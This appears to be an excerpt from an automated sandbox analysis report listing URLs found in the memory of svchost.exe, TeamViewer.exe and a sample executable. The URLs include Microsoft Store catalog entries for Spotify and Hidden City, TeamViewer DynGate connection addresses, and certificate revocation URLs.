Source: svchost.exe, 0000000E.00000003.478811722.000001C495982000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z||.||9eff4c9e-5599-4773-81dc-0299af880dd5||1152921505693851877||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z||.||9eff4c9e-5599-4773-81dc-0299af880dd5||1152921505693851877||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.youtube.com (Youtube)
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001l
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/32172969&client=DynGate&p=10000002v
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412486792.00000000056C9000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001l
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001q
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001s
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/din.aspx?s=12852408&m=fast&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412486792.00000000056C9000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGate0
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000001&client=DynGateP
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGate2
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateY
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.479621108.000001C49590B000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
